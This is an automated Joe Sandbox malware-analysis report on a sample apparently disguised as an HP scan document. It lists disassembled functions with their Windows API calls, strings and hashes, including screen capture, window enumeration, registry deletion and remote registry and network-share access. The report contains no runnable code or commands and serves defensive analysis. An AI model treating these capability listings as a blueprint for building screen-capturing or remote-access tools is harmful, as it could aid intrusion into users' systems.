Opcode Fuzzy Hash: 2467d34105e4abd42b48c4294a79c9d58935356093d2b26c5c20f79f67435d10
Instruction Fuzzy Hash: 20C18F30204201AFDB14EF18D594F6ABBE5FF84308F18855CE5998B7A2DB71ED85CB92

Function 0089255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008925D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008925E8
CreateCompatibleDC.GDI32(?), ref: 008925F4
SelectObject.GDI32(00000000,?), ref: 00892601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0089266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 008926AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 008926D0
SelectObject.GDI32(?,?), ref: 008926D8
DeleteObject.GDI32(?), ref: 008926E1
DeleteDC.GDI32(?), ref: 008926E8
ReleaseDC.USER32(00000000,?), ref: 008926F3

Strings

(, xrefs: 0089268D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: d99a3c6611a1ead676fc74d610e501f5d81ed6c1887d503257c3a8583eaa88fc
Instruction ID: b6a258bdb6412bef341cd0ce997569fce399049b330e00f44595e6631db6f39b
Opcode Fuzzy Hash: d99a3c6611a1ead676fc74d610e501f5d81ed6c1887d503257c3a8583eaa88fc
Instruction Fuzzy Hash: D961F1B5E00219EFDF05DFA8D884AAEBBB5FF48310F248529E955A7250E770A941CF90

Function 0084DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0084DAA1

Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D659
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D66B
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D67D
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D68F
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D6A1
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D6B3
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D6C5
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D6D7
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D6E9
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D6FB
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D70D
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D71F
Part of subcall function 0084D63C: _free.LIBCMT ref: 0084D731

_free.LIBCMT ref: 0084DA96

Part of subcall function 008429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000), ref: 008429DE
Part of subcall function 008429C8: GetLastError.KERNEL32(00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000,00000000), ref: 008429F0

_free.LIBCMT ref: 0084DAB8
_free.LIBCMT ref: 0084DACD
_free.LIBCMT ref: 0084DAD8
_free.LIBCMT ref: 0084DAFA
_free.LIBCMT ref: 0084DB0D
_free.LIBCMT ref: 0084DB1B
_free.LIBCMT ref: 0084DB26
_free.LIBCMT ref: 0084DB5E
_free.LIBCMT ref: 0084DB65
_free.LIBCMT ref: 0084DB82
_free.LIBCMT ref: 0084DB9A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 90dc60f91b231da797b2585f22d2533c472785bd85c4fd343504c9affc5f7828
Instruction ID: 065df8293dfc6e980e3349f81f4a4b17013db8badef4f2b824c51254c4d96de0
Opcode Fuzzy Hash: 90dc60f91b231da797b2585f22d2533c472785bd85c4fd343504c9affc5f7828
Instruction Fuzzy Hash: AA313B3260870D9FEB22AA79E845F5A7BE9FF10360F55452AF449D7291DF31AC40C721

Function 0087365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0087369C
_wcslen.LIBCMT ref: 008736A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00873797
GetClassNameW.USER32(?,?,00000400), ref: 0087380C
GetDlgCtrlID.USER32(?), ref: 0087385D
GetWindowRect.USER32(?,?), ref: 00873882
GetParent.USER32(?), ref: 008738A0
ScreenToClient.USER32(00000000), ref: 008738A7
GetClassNameW.USER32(?,?,00000100), ref: 00873921
GetWindowTextW.USER32(?,?,00000400), ref: 0087395D

Strings

%s%u, xrefs: 00873734

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 809be739f193b7da12dadf5e3be99e53339a914ce9f05b1659b6c0a6ec56ade7
Instruction ID: 84290beeadb343992b1a3b4e59e0f3d6cba3b2de0966efec7c8a26648a4af316
Opcode Fuzzy Hash: 809be739f193b7da12dadf5e3be99e53339a914ce9f05b1659b6c0a6ec56ade7
Instruction Fuzzy Hash: 5F91C171204606AFDB18DF24C885BAAF7A8FF45354F00C629FA9DD2194DB30EA45DB92

Function 00874954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00874994
GetWindowTextW.USER32(?,?,00000400), ref: 008749DA
_wcslen.LIBCMT ref: 008749EB
CharUpperBuffW.USER32(?,00000000), ref: 008749F7
_wcsstr.LIBVCRUNTIME ref: 00874A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00874A64
GetWindowTextW.USER32(?,?,00000400), ref: 00874A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00874AE6
GetClassNameW.USER32(?,?,00000400), ref: 00874B20
GetWindowRect.USER32(?,?), ref: 00874B8B

Strings

ThumbnailClass, xrefs: 00874A6F, 00874AF1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 2397edfed82e8d8ada1cb30933de5cf84acfebc218883ac1bf7d1d72b89a71ea
Instruction ID: d7f1c1073af4a0c1d91380801deca315945975c6d2b9c34a78c2c73dd2fe213c
Opcode Fuzzy Hash: 2397edfed82e8d8ada1cb30933de5cf84acfebc218883ac1bf7d1d72b89a71ea
Instruction Fuzzy Hash: B491BE711042059FDB05DF58C981BAAB7E8FF84314F04946AFD89DA19AEB30ED45CBA2

Function 008A8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00829BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00829BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008A8D5A
GetFocus.USER32 ref: 008A8D6A
GetDlgCtrlID.USER32(00000000), ref: 008A8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 008A8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 008A8ECF
GetMenuItemCount.USER32(?), ref: 008A8EEC
GetMenuItemID.USER32(?,00000000), ref: 008A8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 008A8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 008A8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008A8FA1

Strings

0, xrefs: 008A8E9F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 0b93869fe79abaa9c2002f7dc1796e4dff873be4ceeec21b1feb5375c8105d11
Instruction ID: bddb8c5a0cfb35b8868a32459d08fc0cd7debd65b52fbc7171ee6034c32213ba
Opcode Fuzzy Hash: 0b93869fe79abaa9c2002f7dc1796e4dff873be4ceeec21b1feb5375c8105d11
Instruction Fuzzy Hash: DF819C71508315EFEB10CF24D884AABBBE9FB8A754F140929F985D7691DF70D900CBA2

Function 0087DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0087DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0087DC46
_wcslen.LIBCMT ref: 0087DC50
_wcsstr.LIBVCRUNTIME ref: 0087DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0087DCBC

Strings

\VarFileInfo\Translation, xrefs: 0087DCB4
DefaultLangCodepage, xrefs: 0087DD1F
04090000, xrefs: 0087DCF2
%u.%u.%u.%u, xrefs: 0087DD9A
StringFileInfo\, xrefs: 0087DC8F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: d8ecada9fd6dc1dbb7671201d75e4bf8dc9c7a284e7f22b75f63ea30dbdac441
Instruction ID: ff702ee6a6b43354c9c1f3b902c1d81b072679c897b367b06bab0b3b78aa9028
Opcode Fuzzy Hash: d8ecada9fd6dc1dbb7671201d75e4bf8dc9c7a284e7f22b75f63ea30dbdac441
Instruction Fuzzy Hash: D44117329403147BEB15A7699C43EBF3BBCFF86710F10406AF904E6282EB75D90197A6

Function 0089CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0089CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0089CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0089CD48

Part of subcall function 0089CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0089CCAA
Part of subcall function 0089CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0089CCBD
Part of subcall function 0089CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0089CCCF
Part of subcall function 0089CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0089CD05
Part of subcall function 0089CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0089CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0089CCF3

Strings

RegDeleteKeyExW, xrefs: 0089CCC9
advapi32.dll, xrefs: 0089CCB8

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 8ae14009db217c4f2ff72329295b6bd0c06f498c74afe8329945b18180aa5157
Instruction ID: a471f42764baec8893905b9946a81dca487d3ece20d9c649573841940229c156
Opcode Fuzzy Hash: 8ae14009db217c4f2ff72329295b6bd0c06f498c74afe8329945b18180aa5157
Instruction Fuzzy Hash: AC316C71A01129BBEB20AB54DC88EFFBB7CFF46754F040165E906E2240DA349E45EAA0

Function 0087E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0087E6B4

Part of subcall function 0082E551: timeGetTime.WINMM(?,?,0087E6D4), ref: 0082E555

Sleep.KERNEL32(0000000A), ref: 0087E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0087E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0087E727
SetActiveWindow.USER32 ref: 0087E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0087E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0087E773
Sleep.KERNEL32(000000FA), ref: 0087E77E
IsWindow.USER32 ref: 0087E78A
EndDialog.USER32(00000000), ref: 0087E79B

Strings

BUTTON, xrefs: 0087E719

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 85a31b00e925d5eda0c37ad9d827bb753618fa9639d0da775776f4f0ab559b76
Instruction ID: 60658990388f472e86f1355df645c65a07fd17521ecb21dd0f60498a1fc73aae
Opcode Fuzzy Hash: 85a31b00e925d5eda0c37ad9d827bb753618fa9639d0da775776f4f0ab559b76
Instruction Fuzzy Hash: 4C218170200245AFFF109F64ECC9A253B6DF76A349B108565F51DC66B5DBB1EC00DB25

Function 0087E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0087EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0087EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0087EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0087EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0087EAA7

Strings

status PlayMe mode, xrefs: 0087EA58
open , xrefs: 0087EA0C
alias PlayMe, xrefs: 0087EA36
close PlayMe, xrefs: 0087EA6E, 0087EA9B
play PlayMe wait, xrefs: 0087EA91
play PlayMe, xrefs: 0087EAA2

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: fddc5caebcb12b650e9a14d615773ae9e0238027f613397068220c4ae76ba3cd
Instruction ID: 3c4a6acec5c4bbb9dc6932541cebd508d0a775376675805fe8c74c7ac1055641
Opcode Fuzzy Hash: fddc5caebcb12b650e9a14d615773ae9e0238027f613397068220c4ae76ba3cd
Instruction Fuzzy Hash: 3C118F21A5022D79D720A7A5DC5ADFBAF7CFFD5B40F00052AB821E22D0EE705955C5B1

Function 00875CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00875CE2
GetWindowRect.USER32(00000000,?), ref: 00875CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00875D59
GetDlgItem.USER32(?,00000002), ref: 00875D69
GetWindowRect.USER32(00000000,?), ref: 00875D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00875DCF
GetDlgItem.USER32(?,000003E9), ref: 00875DDD
GetWindowRect.USER32(00000000,?), ref: 00875DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00875E31
GetDlgItem.USER32(?,000003EA), ref: 00875E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00875E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00875E67

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 4c1cddc95296cddcd61f20cbcd622382d024a6cbaad865d49484ff8f9184f230
Instruction ID: 43c3972705daa46087ad1ec786ea8b2b3e825b3ce24efbe477a806d7aebee1f4
Opcode Fuzzy Hash: 4c1cddc95296cddcd61f20cbcd622382d024a6cbaad865d49484ff8f9184f230
Instruction Fuzzy Hash: C551FD71A00609AFDB18CF68DD89AAEBBB5FB59300F148129F519E6694D770EE04CB50

Function 00828BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00828F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00828BE8,?,00000000,?,?,?,?,00828BBA,00000000,?), ref: 00828FC5

DestroyWindow.USER32(?), ref: 00828C81
KillTimer.USER32(00000000,?,?,?,?,00828BBA,00000000,?), ref: 00828D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00866973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00828BBA,00000000,?), ref: 008669A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00828BBA,00000000,?), ref: 008669B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00828BBA,00000000), ref: 008669D4
DeleteObject.GDI32(00000000), ref: 008669E6

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: fedc2389f49be907e8669b4665f57a19fa38448a7be915d56d162daecf961d5c
Instruction ID: 107366fb3f20fa379bf482bd8d57e02c242d2d5bd8cf062578303534e3877024
Opcode Fuzzy Hash: fedc2389f49be907e8669b4665f57a19fa38448a7be915d56d162daecf961d5c
Instruction Fuzzy Hash: 8161AA30502664DFDF21AF28EA88B29BBF1FB51316F554518E042DBA60CB35A8E0CF90

Function 00829838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00829944: GetWindowLongW.USER32(?,000000EB), ref: 00829952

GetSysColor.USER32(0000000F), ref: 00829862

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e0c6ee776396087ca89e5d8a777ec8227cc28250f0e7204297f69749a81a7348
Instruction ID: b934076efa5552902271ab929a3d13388fe2ea178d5081ae6e183c328b45d052
Opcode Fuzzy Hash: e0c6ee776396087ca89e5d8a777ec8227cc28250f0e7204297f69749a81a7348
Instruction Fuzzy Hash: 58419031504654AFEB245F38AC88BB93BA5FB17334F194669F9E2C72E1D7319882DB10

Function 008796E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0085F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00879717
LoadStringW.USER32(00000000,?,0085F7F8,00000001), ref: 00879720

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0085F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00879742
LoadStringW.USER32(00000000,?,0085F7F8,00000001), ref: 00879745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00879866

Strings

^ ERROR, xrefs: 008797FB
Line %d (File "%s"):, xrefs: 0087978F
%s (%d) : ==> %s: %s %s, xrefs: 0087984A
Error: , xrefs: 0087981D
Line %d:, xrefs: 008797A0

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: c295fea69835a6158d9a7910abfb52ad8f4d9792b49a2fe82b78d9dfbdfe8402
Instruction ID: e76d5fb62028e7c509f38640da4b6aecedf1fa50ac367957124cc2c0c9e0b1e4
Opcode Fuzzy Hash: c295fea69835a6158d9a7910abfb52ad8f4d9792b49a2fe82b78d9dfbdfe8402
Instruction Fuzzy Hash: 09414D72800219AADB04EBE8DD96DEEB77CFF15350F104025F645F2192EA356F88CB62

Function 008706DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00816B57: _wcslen.LIBCMT ref: 00816B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008707A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008707BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008707DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00870804
